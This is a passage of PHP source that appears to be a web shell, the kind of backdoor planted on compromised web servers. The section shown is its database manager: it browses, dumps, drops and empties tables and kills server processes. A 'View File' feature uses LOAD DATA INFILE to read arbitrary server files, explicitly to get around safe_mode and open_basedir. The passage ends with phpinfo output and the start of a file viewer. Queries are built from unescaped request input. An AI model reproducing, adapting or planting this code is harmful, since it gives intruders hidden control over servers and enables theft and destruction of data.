1156 $dbs .= "\t\t<option value=\"".$row[0]."\"";
1157 if (@$sql_db == $row[0]) { $dbs .= " selected"; }
1158 $dbs .= ">".$row[0]."</option>\n";
1159 $c++;
1160}
1161echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
1162echo $dbs;
1163 }
1164echo '</select>
1165<hr size="1" noshade>
1166</form>
1167</center>';
1168if (isset($sql_db)) {
1169 $result = mysql_list_tables($sql_db);
1170 if (!$result) {
1171$result = mysql_list_dbs($sql_sock);
1172$num = mysql_num_rows($result);
1173for( $i = 0; $i < $num; $i++ ) {
1174$dbname = mysql_dbname( $result, $i );
1175echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\">$dbname</a></b></td></table>"; } }
1176 else {
1177echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br>\n";
1178$c = 0;
1179while ($row = mysql_fetch_array($result)) {
1180 $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
1181 $count_row = mysql_fetch_array($count);
1182 echo "\t<b>+ <a style='color:#00ff00;' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
1183 mysql_free_result($count);
1184 $c++;
1185}
1186if (!$c) { echo "No tables found in database"; }
1187 }
1188}
1189echo '</td>';
1190echo '<td style="border:1px solid #333333;">';
1191$diplay = TRUE;
1192if (@$sql_db) {
1193 if (!is_numeric($c)) { $c = 0; }
1194 if ($c == 0) { $c = "no"; }
1195 echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
1196 if (count(@$dbquicklaunch) > 0) {
1197foreach($dbsqlquicklaunch as $item) {
1198 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1199}
1200 }
1201 echo "</b></center>\n";
1202 $xs = array("","dump");
1203 if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1204 elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
1205 elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
1206 elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1207 elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1208 elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1209 elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1210 elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
1211 elseif ($sql_tbl_x == "insert") {
1212if ($sql_tbl_insert_radio == 1) {
1213 $keys = "";
1214 $akeys = array_keys($sql_tbl_insert);
1215 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1216 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1217 $values = "";
1218 $i = 0;
1219 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1220 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1221 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1222 $sql_x = "query";
1223 $sql_tbl_x = "browse";
1224}
1225elseif ($sql_tbl_insert_radio == 2) {
1226 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1227 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1228 $result = mysql_query($sql_query) or print(mysql_smarterror());
1229 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1230 $sql_x = "query";
1231 $sql_tbl_x = "browse";
1232}
1233 }
1234 if ($sql_x == "query") {
1235echo "<hr size=\"1\" noshade>";
1236if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1237if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
1238if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
1239 }
1240 if (in_array($sql_x,$xs)) {
1241echo '<table class="tab">
1242<tr>
1243<td style="border:1px solid #333333;padding:3px;">
1244<b>Create new table:</b>
1245<form action="'.$surl.'">
1246<input type="hidden" name="x" value="sql">
1247<input type="hidden" name="sql_x" value="newtbl">
1248<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1249<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1250<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1251<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1252<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1253<input type="text" name="sql_newtbl" size="20">
1254Fields: <input type="text" name="sql_field" size="3">
1255<input class="inputzbut" type="submit" value="Create">
1256</form>
1257</td>
1258<td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
1259<form action="'.$surl.'">
1260<input type="hidden" name="x" value="sql">
1261<input type="hidden" name="sql_x" value="dump">
1262<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1263<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1264<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1265<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1266<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1267<input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql">
1268<input type="submit" class="inputzbut" name="submit" value="Dump">
1269</form>
1270</td>
1271</tr>
1272</table>';
1273if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
1274if ($sql_x == "newtbl") {
1275 echo "<b>";
1276 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1277echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1278 }
1279 else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
1280}
1281elseif ($sql_x == "dump") {
1282 if (empty($submit)) {
1283$diplay = FALSE;
1284echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1285echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1286$v = join (";",$dmptbls);
1287echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1288if ($dump_file) {$tmp = $dump_file;}
1289else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1290echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1291echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1292echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1293echo "<br><br><input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"Dump\">";
1294echo "</form>";
1295 }
1296 else {
1297$diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0;
1298$set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array();
1299if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1300$ret = mysql_dump($set);
1301if ($sql_dump_download) {
1302 @ob_clean();
1303 header("Content-type: application/octet-stream");
1304 header("Content-length: ".strlen($ret));
1305 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1306 echo $ret;
1307 exit;
1308}
1309elseif ($sql_dump_savetofile) {
1310 $fp = fopen($sql_dump_file,"w");
1311 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1312 else {
1313fwrite($fp,$ret);
1314fclose($fp);
1315echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1316 }
1317}
1318else {echo "<b>Dump: nothing to do!</b>";}
1319 }
1320}
1321if ($diplay) {
1322 if (!empty($sql_tbl)) {
1323 if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
1324 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1325 $count_row = mysql_fetch_array($count);
1326 mysql_free_result($count);
1327 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1328$tbl_struct_fields = array();
1329while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1330 if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
1331 if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
1332 if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
1333 if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
1334 $perpage = $sql_tbl_le - $sql_tbl_ls;
1335 if (!is_numeric($perpage)) { $perpage = 10; }
1336 $numpages = $count_row[0]/$perpage;
1337 $e = explode(" ",$sql_order);
1338 if (count($e) == 2) {
1339if ($e[0] == "d") { $asc_desc = "DESC"; }
1340else { $asc_desc = "ASC"; }
1341$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1342 }
1343 else {$v = "";}
1344 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1345 $result = mysql_query($query) or print(mysql_smarterror());
1346 echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1347 echo "<hr size=\"1\" noshade>";
1348 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> ";
1349 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> ";
1350 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
1351 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[ <b>Insert</b> ]</a> ";
1352 if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
1353 if ($sql_tbl_x == "insert") {
1354if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1355if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
1356else {
1357 echo "<br><br><b>Inserting row into table:</b><br>";
1358 if (!empty($sql_tbl_insert_q)) {
1359$sql_query = "SELECT * FROM `".$sql_tbl."`";
1360$sql_query .= " WHERE".$sql_tbl_insert_q;
1361$sql_query .= " LIMIT 1;";
1362$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1363$values = mysql_fetch_assoc($result);
1364mysql_free_result($result);
1365 }
1366 else {$values = array();}
1367 echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
1368 foreach ($tbl_struct_fields as $field) {
1369$name = $field["Field"];
1370if (empty($sql_tbl_insert_q)) {$v = "";}
1371echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1372$i++;
1373 }
1374 echo "</table><br>";
1375 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1376 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1377 echo "<br><br><input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form>";
1378}
1379 }
1380 if ($sql_tbl_x == "browse") {
1381$sql_tbl_ls = abs($sql_tbl_ls);
1382$sql_tbl_le = abs($sql_tbl_le);
1383echo "<hr size=\"1\" noshade>";
1384echo "<b>Page: </b>";
1385$b = 0;
1386for($i=0;$i<$numpages;$i++) {
1387 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1388 echo $i;
1389 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1390 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1391 else { echo " "; }
1392}
1393if ($i == 0) {echo "empty";}
1394echo "<br><br><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
1395echo "<br><form method=\"POST\">\n";
1396echo "<table class='tub'><tr>";
1397echo "<th><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></th>";
1398for ($i=0;$i<mysql_num_fields($result);$i++) {
1399 $v = mysql_field_name($result,$i);
1400 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1401 else {$s = "a"; $m = "desc";}
1402 echo "<th>";
1403 if (empty($e[0])) {$e[0] = "a";}
1404 if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1405 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
1406 echo "</th>";
1407}
1408echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
1409echo "</tr>";
1410while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1411 echo "<tr>";
1412 $w = "";
1413 $i = 0;
1414 foreach ($row as $k=>$v) {
1415$name = mysql_field_name($result,$i);
1416$w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
1417 }
1418 if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
1419 echo "<td align='center' style='padding:0px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1420 $i = 0;
1421 foreach ($row as $k=>$v) {
1422$v = htmlspecialchars($v);
1423if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
1424echo "<td>".$v."</td>";
1425$i++;
1426 }
1427 echo "<td>";
1428 echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
1429 echo " | ";
1430 echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
1431 echo "</td>";
1432 echo "</tr>";
1433}
1434mysql_free_result($result);
1435echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\"/> <select name=\"sql_x\">";
1436echo "<option value=\"\">With selected:</option>";
1437echo "<option value=\"deleterow\">Delete</option>";
1438echo "</select> <input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form></p>";
1439}
1440 }
1441 else {
1442$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1443if (!$result) { echo mysql_smarterror(); }
1444else {
1445echo '<form method="POST">
1446<table class="tub">
1447<tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
1448 $i = 0;
1449 $tsize = $trows = 0;
1450 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1451$tsize += $row["Data_length"];
1452$trows += $row["Rows"];
1453$size = view_size($row["Data_length"]);
1454echo'<tr>
1455<td align="center" style="padding:0px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'"></td>
1456<td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'"><b>'.$row["Name"].'</b></a></td>
1457<td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
1458<td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a> | <a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a> | <a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
1459</tr>';
1460$i++;
1461 }
1462 echo "\t\t<tr>\n".
1463"\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
1464echo'</tr>
1465</table>
1466<div align="right">
1467<select class="inputz" name="sql_x">
1468<option value="">With selected:</option>
1469<option value="tbldrop">Drop</option>
1470<option value="tblempty">Empty</option>";
1471<option value="tbldump">Dump</option>";
1472<option value="tblcheck">Check table</option>";
1473<option value="tbloptimize">Optimize table</option>";
1474<option value="tblrepair">Repair table</option>";
1475<option value="tblanalyze">Analyze table</option>";
1476</select>
1477<input class="inputzbut" type="submit" value="Confirm">
1478</div>
1479</form>';
1480 mysql_free_result($result);
1481}
1482 }
1483}
1484 }
1485}
1486else {
1487$xs = array("","newdb","serverstatus","servervars","processes","getfile");
1488if (in_array($sql_x,$xs)) {
1489echo '<table class="tab">
1490<tr>
1491<td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
1492<form action="'.$surl.'">
1493<input type="hidden" name="x" value="sql">
1494<input type="hidden" name="sql_x" value="newdb">
1495<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1496<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1497<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1498<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1499<input class="inputz" type="text" name="sql_newdb" size="20">
1500<input class="inputzbut" type="submit" value="Create">
1501</form>
1502</td>
1503<td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
1504<form action="'.$surl.'">
1505<input type="hidden" name="x" value="sql">
1506<input type="hidden" name="sql_x" value="getfile">
1507<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1508<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1509<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1510<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1511<input class="inputz" type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'">
1512<input class="inputzbut" type="submit" value="Get">
1513</form>
1514</td>
1515</tr>
1516</table>';
1517}
1518if (!empty($sql_x)) {
1519 echo "<hr size=\"1\" noshade>";
1520 if ($sql_x == "newdb") {
1521echo "<b>";
1522if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1523else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1524 }
1525 if ($sql_x == "serverstatus") {
1526$result = mysql_query("SHOW STATUS", $sql_sock);
1527echo "<center><b>Server status variables:</b><br><br>";
1528echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1529while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1530echo "</table></center>";
1531mysql_free_result($result);
1532 }
1533 if ($sql_x == "servervars") {
1534$result = mysql_query("SHOW VARIABLES", $sql_sock);
1535echo "<center><b>Server variables:</b><br><br>";
1536echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1537while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1538echo "</table>";
1539mysql_free_result($result);
1540 }
1541 if ($sql_x == "processes") {
1542if (!empty($kill)) {
1543 $query = "KILL ".$kill.";";
1544 $result = mysql_query($query, $sql_sock);
1545 echo "<b>Process #".$kill." was killed.</b>";
1546}
1547$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1548echo "<center><b>Processes:</b><br><br>";
1549echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
1550while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1551echo "</table>";
1552mysql_free_result($result);
1553 }
1554 if ($sql_x == "getfile") {
1555$tmpdb = $sql_login."_tmpdb";
1556$select = mysql_select_db($tmpdb);
1557if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1558if ($select) {
1559 $created = FALSE;
1560 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1561 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1562 $result = mysql_query("SELECT * FROM tmp_file;");
1563 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1564 else {
1565for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1566$f = "";
1567while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1568if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1569else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1570mysql_free_result($result);
1571mysql_query("DROP TABLE tmp_file;");
1572 }
1573}
1574mysql_drop_db($tmpdb);
1575 }
1576}
1577 }
1578}
1579echo '</td></tr>';
1580if ($sql_sock) {
1581 $affected = @mysql_affected_rows($sql_sock);
1582 if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1583 echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1584}
1585echo '</table></center>';
1586 }
1587echo '</form>';
1588}
1589}
1590//*--------------------------------[ batas ]--------------------------------*//
1591
1592
1593elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ini_set('output_buffering',0);
1594 @ob_start();
1595 @eval("phpinfo();");
1596 $buff = @ob_get_contents();
1597 @ob_end_clean();
1598 $awal = strpos($buff,"<body>")+6;
1599 $akhir = strpos($buff,"</body>");
1600 echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1601}
1602elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1603 if(is_file($_GET['view'])){
1604 if(!isset($file)) $file = magicboom($_GET['view']);
1605 if(!$win && $posix){
1606 $name=@posix_getpwuid(@fileowner($folder));
1607 $group=@posix_getgrgid(@filegroup($folder));
1608 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1609 }
1610 else {
1611 $owner = $user;
1612 }
1613 $filn = basename($file);
1614 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1615 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1616 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1617 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1618 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1619 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
1620 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1621 </form>
1622 </td></tr>
1623 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1624 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1625 <tr><td>Owner</td><td>".$owner."</td></tr>
